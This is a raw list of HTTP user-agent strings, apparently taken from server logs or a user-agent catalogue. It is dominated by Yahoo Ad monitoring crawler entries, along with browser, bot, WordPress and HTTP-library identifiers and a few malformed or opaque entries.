https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633052017-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633060573-0 +axios/0.21.4 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633081610-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633085392-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633086108-0 +WordPress/5.8.1; https://www.kanaktec.com +WhatsApp/2.21.20.12 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633047441-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633047447-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 PTST/210930.181447 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36 PTST/210930.181447 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633057016-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633057019-0 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/94.0.4606.61 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/94.0.4606.61 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; YandexAccessibilityBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4526.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633047448-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633057020-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633047443-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633057017-0 +WordPress/5.8.1; https://siliconvalleygazette.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.6.805 (SpeedMode; Proxy; Android 2.3.6; GT-S5839i ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633071560-0 +libwww-perl/6.57 +GuzzleHttp/6.3.3 curl/7.58.0 PHP/7.3.6-1+ubuntu18.04.1+deb.sury.org+1 Java/1.8.0_20 LuaSocket 3.0-rc1 Mozilla/5.0 (Linux; Android 10; SM-A305F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.181 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 7.1.1; SM-J250F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.110 Mobile Safari/537.36 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.1950.122 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.92 Safari/537.36 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 Edg/89.0.774.50 Mozilla/5.0 (iPhone; CPU iPhone OS 14_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Mobile/18A8395 Safari/604.1 python-requests/2.18.4 python-requests/2.21.0 python-requests/2.23.0 unknown +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633220153-10 +WordPress/4.4.25; http://annagruchel.com; verifying pingback from 195.248.243.228 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633222309-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633234049-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633230954-10 +Mozilla/5.0 (compatible; YandexAccessibilityBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4496.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633225640-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633225687-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633225578-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633256651-10 +Java/16 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633224628-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633236841-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633237383-0 +WhatsApp/2.21.20.13 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633220148-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633220166-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633230884-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633230953-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4575.0 Mobile Safari/537.36 PTST/210331.204756 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633220187-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633230954-0 +WordPress/5.8.1; https://radiosit.ru +ddg_android/5.96.1 (com.duckduckgo.mobile.android; Android API 28) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633220149-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633230886-0 +WordPress/5.8.1; https://logincalt.com +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Mobile Safari/537.36 PTST/210930.181447 +RadiosNet/2.2.4 (Java; Android) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633306452-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633319046-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633309333-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633322237-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633306453-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633319047-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633308811-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633320443-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633321890-10 +Python/3.5 aiohttp/3.6.3 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633366390-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633312573-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633326489-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633328422-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633328474-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633379018-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633306450-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633306453-0 +yacybot (-global; amd64 Linux 4.19.0-6-amd64; java 11.0.6; Europe/de) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633319048-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633319043-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633306454-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633319049-0 +ddg_android/5.97.0 (com.duckduckgo.mobile.android; Android API 30) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633306451-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633319045-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.168 Mobile Safari/537.36 PTST/210331.204756 +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/94.0.4606.71 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633394306-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633407522-0 +WordPress/5.8.1; https://wallmessage.com +yacybot (/global; amd64 Linux 5.10.0-8-amd64; java 1.8.0_242; Etc/en) http://yacy.net/bot.html +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633392926-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633405594-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633395978-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633408624-20 +WordPress/5.7.3; http://mantometr.ir +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633392927-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633405595-10 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4531.2 Mobile Safari/537.36 PTST/210331.204756 +502 Bad Gateway +

    502 Bad Gateway

    +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4534.0 Mobile Safari/537.36 PTST/210707.145501 + +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633449162-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633458272-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633397020-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633398820-0 +WhatsApp/2.2138.10 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633411876-0 +WhatsApp/2.21.19.19 A +WhatsApp/2.2138.13 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633449526-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633456981-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633392929-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633392923-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633405595-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633405592-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4539.0 Mobile Safari/537.36 PTST/210331.204756 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633463325-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.3.0.1130 (SpeedMode; Proxy; Android 5.0.1; ALCATEL_ONE_TOUCH_7025D ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633392930-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633405596-0 +ddg_android/5.94.3 (com.duckduckgo.mobile.android; Android API 24) +WordPress/5.8.1; https://euronutrition.ru +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633463325-60 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633463324-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633392925-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633405593-0 +Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) sieve.k8s.crawler-production/1633426295-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633463325-10 +\x22Googlebot/2.1\x22 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB6.6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; BO1IE8_v1;ENUS +U2FsdGVkX1+1SiE/QSR276cx2fA+gML91/FbVqTeV9bm8ANBbuVekRe7URXEMFX3dKcAD86wtJhsTDQR4gmaq7PK7tw6CNWHuFxJU1b1QsxPl00xvvnG/4W8XnaO1ScqrhCSSoOpguVplF1GmprfATv9xuJHTn98eGQVIEzaUbIHW6XkmSagNJCo88ZcDZkUpOyXDjRuTC/v9X3RR+aX1oZD2mFQxbb09oQX9SbawjGw7If93xCfuI4wC7sdO7ly6x09LdeSMVP57KSDME/NJAVApE8bJKd25oSU5vywjrY= +AmigaAMP/3 +WordPress/5.8.1; https://www.lengthytravel.com +WhatsApp/2.21.21.2 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633479585-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633493062-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633482689-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633497280-20 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.1.1091 (SpeedMode; Proxy; Android 5.1; LG-X230 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633479586-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633493063-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633480502-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633486012-0 +WordPress/5.8.1; https://login4portal.xyz +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633500086-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633524593-0 +FDM/6.15.0.4140 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633479555-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633479588-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633493061-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633493064-0 +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.7 Mobile Safari/537.36 PTST/210331.204756 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633479589-0 +WordPress/5.6.5; https://wattson.pt +WordPress/4.9.9; https://www.motor24.pt +Arquivo-web-crawler (compatible; heritrix/3.4.0-20200304 +https://arquivo.pt/faq-crawling) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633479557-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633493062-0 +https://user-agents.net/string/ddg-android-5-95-0-com-duckduckgo-mobile-android-android-api-28 +https://user-agents.net/string/mozilla-5-0-compatible-linux-x86-64-mail-ru-bot-fast-2-0-http-go-mail-ru-help-robots-python-requests-2-2-1-cpython-2-7-6-linux-4-9-80-c9 +Mozilla/5.0(compatible;Googlebot/2.1;+//www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1633495581-0 +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:40.77.167.5 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633565761-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633577521-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633601341-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633615645-10 +PHP/7.2.45 +GuzzleHttp/6.5.5 curl/7.64.0 PHP/8.0.10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633568889-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633579208-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633604194-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633619190-20 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1633565762-10 